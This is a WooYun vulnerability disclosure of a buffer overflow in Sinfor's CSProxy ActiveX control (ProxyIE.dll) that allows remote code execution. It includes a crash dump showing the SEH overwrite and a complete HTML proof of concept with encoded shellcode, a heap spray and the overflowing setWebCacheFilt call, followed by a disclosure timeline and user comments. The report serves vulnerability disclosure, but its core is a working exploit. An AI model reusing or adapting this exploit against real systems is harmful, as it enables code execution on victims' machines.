破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

#2 Sinfor CSProxy ActiveX Remote Code Execution

编号40476
Urlhttp://www.wooyun.org/bug.php?action=view&id=40476
漏洞状态厂商已经确认
漏洞标题#2 Sinfor CSProxy ActiveX Remote Code Execution
漏洞类型远程代码执行
厂商深信服
白帽子想要减肥的胖纸
提交日期2013-10-21 09:30:00
公开日期2014-01-19 09:31:00
修复时间(not set)
确认时间2013-10-24 00:00:00
Confirm Spend3
漏洞标签缓冲区溢出 activex漏洞
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank12
漏洞简介
This exploit test on winxp sp3 ie6
漏洞细节

名称:         CSProxy Class
发行者: Sinfor Technologies Co.,Ltd
类型: ActiveX 控件
版本: 4. 2. 1. 3
文件日期:
上次访问日期: 2013年10月21日,0:27
类 ID: {53EC2F48-968E-4A42-B99B-9F6571474213}
使用计数: 40
阻止次数: 0
文件: ProxyIE.dll
文件夹: C:\Program Files\Sinfor\SSL\ClientComponent


Exception Code: ACCESS_VIOLATION
Disasm: 77BA6F29 MOV [EDI],EDX (msvcrt.dll)
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
msvcrt.77BA6F29 41414141
Registers:
--------------------------------------------------
EIP 77BA6F29
EAX 7EFEFEFE
EBX 01AD8324 -> 01A714D3
ECX 0218148C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EDI 00140000 -> 78746341 -> Asc: ActAct
ESI 0018BD94 -> 00030003
EBP 0013ECD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013EB70 -> 0013ECC4
Block Disassembly:
--------------------------------------------------
77BA6F18 JE SHORT 77BA6F80
77BA6F1A MOV [EDI],DL
77BA6F1C ADD EDI,1
77BA6F1F TEST ECX,3
77BA6F25 JNZ SHORT 77BA6F11
77BA6F27 JMP SHORT 77BA6F2E
77BA6F29 MOV [EDI],EDX <--- CRASH
77BA6F2B ADD EDI,4
77BA6F2E MOV EDX,7EFEFEFF
77BA6F33 MOV EAX,[ECX]
77BA6F35 ADD EDX,EAX
77BA6F37 XOR EAX,FFFFFFFF
77BA6F3A XOR EAX,EDX
77BA6F3C MOV EDX,[ECX]
77BA6F3E ADD ECX,4
ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 41414141
EBP+16 41414141
EBP+20 41414141
EBP+24 41414141
EBP+28 41414141
Stack Dump:
--------------------------------------------------
13EB70 C4 EC 13 00 22 54 AB 01 C0 EB 13 00 48 00 18 02 [.....T......H...]
13EB80 00 00 00 00 98 48 AF 01 41 41 41 41 41 41 41 41 [.....H..........]
13EB90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
13EBA0 41 41 41 41 B0 8D 03 00 01 41 41 41 41 41 41 41 [................]
13EBB0 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 [................]

POC

<html>
<body>
<object classid="clsid:53EC2F48-968E-4A42-B99B-9F6571474213"id="target"></object>
<input type="button" onclick="test()" value="test" />
<script>
function test()
{
var shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
var nops=unescape('%u9090%u9090');
var headersize =20;
var slackspace= headersize + shellcode.length;
while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);
while( block.length+ slackspace<0x50000)
block= block+ block+ fillblock;
memory=new Array();
for( i=0; i<200; i++)
memory[i]= block + shellcode;
var buffer='';
for( i=0; i<=300; i++)
buffer+=unescape("%0D%0D%0D%0D");
target.setWebCacheFilt(1,buffer);
}
</script>
</body>
</html>

修复方案

状态信息 2013-10-21: 细节已通知厂商并且等待厂商处理中
2013-10-24: 厂商已经确认,细节仅向厂商公开
2013-10-27: 细节向第三方安全合作伙伴开放
2013-12-18: 细节向核心白帽子及相关领域专家公开
2013-12-28: 细节向普通白帽子公开
2014-01-07: 细节向实习白帽子公开
2014-01-19: 细节向公众公开
厂商回复
回应信息危害等级:高漏洞Rank:12 确认时间:2013-10-24 19:05
Showing 1-6 of 6 items.
评论内容评论人点赞数评论时间

给力

wefgod02013-10-27 22:31:00

@想要减肥的胖纸 加油,一个精华为你而留

疯狗02013-10-22 10:43:00

膜拜会挖漏洞会写exp的大牛

ltes02013-10-21 19:42:00

@疯狗 我想bypass dep 可是啥也不懂,然后也试了 java applet 想bypassdep 可是 连弹个计算器都没成功,唉。正在学习,一边挖一边学。

想要减肥的胖纸02013-10-21 18:47:00

如果不是堆喷射的exp我就给你加精

疯狗02013-10-21 18:20:00

这辈子就崇拜会英语的人 o(︶︿︶)o

M4sk02013-10-21 18:08:00